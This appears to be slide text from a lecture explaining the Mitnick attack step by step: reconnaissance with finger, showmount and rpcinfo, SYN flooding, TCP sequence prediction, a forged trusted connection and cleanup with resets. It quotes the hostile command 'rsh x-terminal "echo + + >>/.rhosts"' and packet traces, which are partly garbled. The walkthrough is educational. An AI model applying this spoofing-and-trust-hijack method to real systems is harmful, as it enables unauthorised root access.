M ITNICK A TTACK

WHO IS THIS GUY?

IDENTIFYING TRUST RELATIONSHIPS Mitnick used IP spoofing to identify the trust relationship. 14:09:32 toad.com# finger 14:10:21 toad.com# finger 14:10:50 toad.com# finger -l 14:11:07 toad.com# finger 14:11:38 toad.com# showmount -e x-terminal 14:11:49 toad.com# rpcinfo -p x-terminal 14:12:05 toad.com# finger -l The finger command checks if anyone logon. The showmount provides information about the file systems mounted with Network File System (NFS). Rpcinfo lists the available rpc-services.

Server silenced Send SYN/ACK x-terminalServer Send SYN/ACK Send SYN/ACK-ACK Open 20 connections to predict the sequence no. Send SYNs Send RESETs to empty Server connection queue Attacker

SYN-F LOODING Six minutes later, a flurry of TCP-SYN (initial connection requests) from to port 513 (login) on server. The purpose of these SYNs is to fill the connection queue for port 513 on server with "half-open" connections so it will not respond to any new connection requests. In particular, it will not generate TCP RSTs in response to unexpected SYN-ACKs. Finally the server is being silenced.

SYN-F LOODING ( CONT.) 14:18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win :18: > server.login: S : (0) win 4096

SYN-F LOODING ( CONT.) 20 connection attempts from apollo.it.luc.edu to x-terminal.shell. The purpose of these attempts is to determine the behavior of x-terminal's TCP sequence number generator :18: apollo.it.luc.edu.1000 > x-terminal.shell: S : (0) win :18: x-terminal.shell > apollo.it.luc.edu.1000: S : (0) ack win :18: apollo.it.luc.edu.1000 > x-terminal.shell: R : (0) win :18: apollo.it.luc.edu.999 > x-terminal.shell: S : (0) win :18: x-terminal.shell > apollo.it.luc.edu.999: S : (0) ack win :18: apollo.it.luc.edu.999 > x-terminal.shell: R : (0) win 0 +++

SYN-F LOODING ( CONT.) The sequence number in x-terminal’s SYN/ACK from the second set packet is The sequence number in the preceding set's SYN/ACK is =128,000 As we trace down the rest of set of packets we found that 128,000 is repeatable. We know that anytime we send a SYN to x-terminal, the SYN/ACK will come back 128,000 or higher, as long as it is the next connection.

S ETTING U P T HE S YSTEM C OMPROMISE / H IJACKING A forged SYN (connection request), allegedly from server.login to x-terminal.shell. The assumption is that x-terminal probably trusts server, so x-terminal will do whatever server (or anything masquerading as server) asks. x-terminal then replies to server with a SYN-ACK, which must be ACK'd in order for the connection to be opened. As server is ignoring packets sent to server.login, the ACK must be forged as well. 14:18: server.login > x-terminal.shell: S : (0) win :18: server.login > x-terminal.shell:. ack win 4096

S ETTING U P T HE S YSTEM C OMPROMISE / H IJACKING ( CONT.) In the first line x-terminal is stimulated by server to open the connection. Server never sees the SYN/ACK so that is why it is missing from the trace. However, he knows to add 128,000 plus 1 to the initial sequence number that x-terminal proposed when sending the SYN/ACK. After the lone ACK, the connection is open. With the real server disabled by the SYN flood, the trusted connection is used to execute the following UNIX command with rshell: rsh x-terminal "echo + + >>/.rhosts".

S ETTING U P T HE S YSTEM C OMPROMISE / H IJACKING ( CONT.) The result of this causes x-terminal to trust, as root, all computers and all users on these computers (as already discussed). That trace is as follows: 14:18: server.login > x-terminal.shell: P 0:2(2) ack 1 win :18: server.login > x-terminal.shell: P 2:7(5) ack 1 win :18: server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096 At this point, the connection is terminated by sending a FIN to close the connection. Mr. Mitnick logs on to x-terminal from the computer of his choice and can execute any command. The target system, x-terminal, is compromised: 14:18: server.login > x-terminal.shell:. ack 2 win :18: server.login > x-terminal.shell:. ack 3 win :18: server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096

S ETTING U P T HE S YSTEM C OMPROMISE / H IJACKING ( CONT.) If Mitnick were now to leave the computer named server in its mute state and someone else were to try to rlogin, he would fail, which might bring unwanted attention to the situation. Therefore, the connection queue is emptied with a series of RESETs. 14:18: > server.login: R : (0) win :18: > server.login: R : (0) win :18: > server.login: R : (0) win :18: > server.login: R : (0) win :18: > server.login: R : (0) win 4096 …

Server silenced Send SYN/ACK x-terminalServer Send SYN/ACK Send SYN/ACK-ACK Open 20 connections to predict the sequence no. Send SYNs Send RESETs to empty Server connection queue Attacker

THE END